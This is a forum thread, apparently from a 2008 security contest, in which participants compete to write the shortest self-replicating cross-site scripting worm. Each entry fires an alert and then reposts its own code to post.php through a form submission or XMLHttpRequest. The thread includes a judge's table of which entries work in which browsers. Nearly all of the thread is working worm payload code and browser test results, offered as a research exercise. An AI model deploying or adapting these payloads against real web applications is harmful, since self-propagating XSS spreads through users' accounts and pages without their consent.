With very many props to Sirdarckcat:
151
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>

Works in Firefox 2.0.0.11, doesn't work in IE6.0 ;x, can someone test it in IE7?

Edit: Forgot about FireFox adding stuff again.

-Spyware | [bitsofspy.net]



Edited 1 time(s). Last edit at 01/05/2008 04:21PM by Spyware.

This does work without expanding, though:

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

Trimmed a few and tested. Unless I missed something else... :-)

shawn:

should be 143, but awezome!! u are first place now.

and the obvious one without issues:

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',_[0].value='<form>'+innerHTML.slice(alert('XSS'),152))">

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 2 time(s). Last edit at 01/05/2008 04:24PM by sirdarckcat.

@shawn: Well, I'm doing a lot of optimization on the codes, but it only gets larger. :D
I've replaced couples of chars with shorter ones, but when it goes to defining all the new variables, it beats me every time ...

---
~~Patching is for suckers~~

[www.bitsploit.de]

@sirdarckcat:

And where is: _ ? ;)

---
~~Patching is for suckers~~

[www.bitsploit.de]



Edited 1 time(s). Last edit at 01/05/2008 04:25PM by Alex.

Sorry for this stupid question, but do you have to set name.value and document.body.etc in IE7? Because this:

<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>

Works in FireFox. It's 134 characters, but I have the feeling that IE can't handle this stuff anymore. Since I don't want to install IE7 on my computer, can anyone please test this/tell me if I need name in [name.value] and document in [document.body.etc].

-Spyware | [bitsofspy.net]

<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">

136

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Alex u r right lol

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

ma1:
I dont know if onfocus is valid..

haha I'll let rsnake decide xD

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

this are the places without numbers

.- ma1 (129) [requires the user to focus a field]
.- Spyware (134) [requires the user to focus a field]
.- shawn (153) <form> (with doctype issues)
.- ma1 (156) <form> (with doctype issues)
.- sirdarckcat (158) (with doctype issues)
.- sirdarckcat (161)
.- ma1 (163) <form>
.- ritz (167) <form>
.- babarianbob (168) <form>
.- .mario (178) <form>
.- Gareth Heyes (229) <form>
.- Matt Presson (233) <form>
.- digi7al64 (266) <form>

the first 4 may not be valid, depends on rsnake

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 1 time(s). Last edit at 01/05/2008 04:58PM by sirdarckcat.

Quote:

sirdarckcat
or what do you mean?

I was exactly trying to say that :-).

Quote:

Spyware

<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>

Very nice, but what if there is another <f.* tagname in front of your code, say the never used FONT ;-) (not even talking about another form or fieldset, I hope it won't be a frame/frameset page because than no single vector given here would work). See the W3C index of elements.

Just in case...

<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">

129

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

ý<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/ý.*/);alert('xss');submit()"></form>

Which comes down to.. heh.. 134. And this probably won't work in IE7, and I can't remove the damned </form> tag.

Ah well.

-Spyware | [bitsofspy.net]

In response to sirdarckcat <form> list, let's make an XMLHttpResponse list too ;-).

- bwb labs (193 bytes) [without Content-Type]
- bwb labs (264 bytes) [with Content-Type]

Haven't seen other stable working versions yet (the one who use function toString's have growing problems on FF).
Here is the long version with Content-Type:

<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>

ma1 Wrote:
-------------------------------------------------------
> Just in case...
> <form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">
>
> 129

Well,if we can use events, why not do:

<form><input name="content" onblur="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),122))">

...and drop another byte?

I think events like that wont be valid..

.- shawn (128) [requires the user to focus and blur a field]
.- ma1 (129) [requires the user to focus a field]
.- Spyware (134) [requires the user to focus a field]
.- shawn (153) <form> (with doctype issues)
.- ma1 (156) <form> (with doctype issues)
.- sirdarckcat (158) <form> (with doctype issues)
.- sirdarckcat (161)
.- ma1 (163) <form>
.- ritz (167) <form>
.- babarianbob (168) <form>
.- .mario (178) <form>
.- Gareth Heyes (229) <form>
.- Matt Presson (233) <form>
.- digi7al64 (266) <form>

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

sirdarckcat Wrote:
-------------------------------------------------------
> I think events like that wont be valid..

I do agree with that for this exercise, though I can understand the opposing argument.

It just seemed like just as valid an assumption to make: if a user draws focus to an element, the next action they take will draw focus away from that element.

Unofficial judges:

with doctype
[loteria-gratis.com.ar]
without doctype
[loteria-gratis.com.ar]

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

Open questions for RSnake:
- can we omit XHR Content-Type header?
- can we omit urlencoding?

Neither of these would be a showstopper for the replication if post.php is a script we control or can make assumptions about - Apache/PHP don't need to parse the posted contents if the target script reads php://stdin or uses a similar method. Of course if we have to support target scripts that use the Apache/PHP $_POST variable parsing both Content-type and (probably, depends on what you post) urlencoding are required.

There are three main issues in this contest:
- how to make the code run (most use script element, img onerror, or various other events)
- how the code can read itself (most - all? - replies rely on innerHTML or function.toString) and what serialization/stringification rules in the UA you must take into account to avoid the code growing
- how to post back to the server (FORM.submit() or XMLHttpRequest are the only options since POST is required)

I contribute two variations nobody explored so far, which I think solves problem 1 and 2 quite elegantly. First a note on Firefox behaviour: for these two examples to work in Firefox it needs a full URL (http://..) and not just post.php. It appears to be a bug in Firefox where a base URL for resolving relative URLs against is missing from JavaScript-generated source. Ideally I'd like that bug not to be held against me :-p and the extra length this problem adds to the code will of course depend on what server you use to test it from so I give the character counts without taking this into account. As posted they don't "work" in Firefox..

Using IFRAME src and FORM post:

<iframe src="javascript:alert('XSS');onload=function(){f[0].value='<iframe src=\x22'+frameElement.src+'\x22>';f.submit()};'<form method=post action=post.php id=f><input name=content>'">

- 185 characters.

Using IFRAME src and XHR - note that I have left out the content-type and urlencoding:

<iframe src="javascript:alert('XSS');with(new top.XMLHttpRequest){open('post','post.php');send('content=<iframe src=\x22'+frameElement.src+'\x22>')}">

- 150 characters.

Awaiting a reply from RSnake on the two questions above and this one:
- if Firefox requires an absolute URL to post.php, can I still submit an entry with a relative URL? If no, what server name should I use?

Hallvord Reiar Michaelsen Steen
[my.opera.com] [www.hallvord.com]
+ Browsing with Opera :-) +

hallvors
as far as I've tested, your codes doesnt self-replicates.

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

About the judges I made:

Use this one:
[loteria-gratis.com.ar]

Because the judge1 is more strict..

And well, there are several codes that have minor mistakes, because they encode their payload, and you don't need to do that.

Greetz!!

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

sirdarckcat: could you be more specific, how does it fail and in what browser? Tested in IE7 and Firefox 2 (with server name added).

Unofficial Jude Result:

Codes tested:

0.- ma1 (136) [requires user to focus a field]
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">

1.- shawn (153) [doctype issues]
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),143))</script>

2.- ma1 (156) [doctype issues]
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

3.- sirdarckcat (158) [doctype issues]
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.slice(0,148)))</SCRIPT>

4.- bwb labs (168) [DOESNT WORK FOR APACHE NOR IIS]
<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>

5.- babarianbob (171)
<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>

6.- .mario (178) 
<b><img src="m" onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

7.- Gareth Heyes (229) [CAN BE REDUCED]
<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>

8.- Matt Presson (233) [CAN BE REDUCED]
<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>

9.- digi7al64 (266) [CAN BE REDUCED]
<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>

A.- sirdarckcat (161)
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">

B.- ma1 (163)
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">

C.- ritz (167)
<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';type=value='<form>'+p.innerHTML.substr(0,161);submit()" type="image">

0(136).- 3 Works on: IE FF(1 and 2) [requires user interaction]
1(153).- 2 Works on: IE FF(2)
2(156).- 2 Works on: IE FF(2)
3(158).- 2 Works on: IE FF(2)
4(168).- 0 Works on: NONE
5(171).- 2 Works on: IE FF(2)
6(178).- 3 Works on: IE FF(1 and 2)
7(229).- 0 Works on: NONE, encoding error
8(233).- 0 Works on: NONE
9(266).- 0 Works on: NONE, encoding error
A(161).- 3 Works on: IE FF(1 and 2)
B(163).- 3 Works on: IE FF(1 and 2)
C(167).- 3 Works on: FF(1 and 2)

So according to theunofficial judges the top are:
0(136).- 3 Works on: IE FF(1 and 2) [requires user interaction]
A(161).- 3 Works on: IE FF(1 and 2)
B(163).- 3 Works on: IE FF(1 and 2)
6(178).- 3 Works on: IE FF(1 and 2)

Because work with any doctype

and the top in the general case:
0(136).- 3 Works on: IE FF(1 and 2) [requires user interaction]
1(153).- 2 Works on: IE FF(2)
2(156).- 2 Works on: IE FF(2)
3(158).- 2 Works on: IE FF(2)
A(161).- 3 Works on: IE FF(1 and 2)
B(163).- 3 Works on: IE FF(1 and 2)
C(167).- 3 Works on: FF(1 and 2) **?
5(171).- 2 Works on: IE FF(2)
6(178).- 3 Works on: IE FF(1 and 2)


Just take in consideration that "0"(one of ma1's codes) requires user interaction.

So.. this is not official..

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

(If you use your PHP script to test it keep in mind that I have not added content-type to the XHR post pending RSnake's response to the question. I assume your PHP script doesn't see the post contents for this reason.)

@hallvors:
test your code here:
[loteria-gratis.com.ar]

I understand the issue with the XHR code, but the <form> is also not working

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 1 time(s). Last edit at 01/05/2008 06:17PM by sirdarckcat.

Just tested the <form> version there in IE7, it worked fine. If you test in Firefox you have to change post.php to the full URL to that script, as mentioned in my original post.

@hallvors:
ah I see, I missed that, sorry
yours is working fine, anyway, adding the length of the url may be an issue.. lets see what rsnake says

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 1 time(s). Last edit at 01/05/2008 06:26PM by sirdarckcat.

Ah damned. Forgot the firefox adding stuff thing -again-.

ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.match(/ý.*/);" type="submit"></form>

140 Characters.

-Spyware | [bitsofspy.net]



Edited 4 time(s). Last edit at 01/05/2008 06:51PM by Spyware.

spyware:
yours doesnt work on IE

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

Blast.

-Spyware | [bitsofspy.net]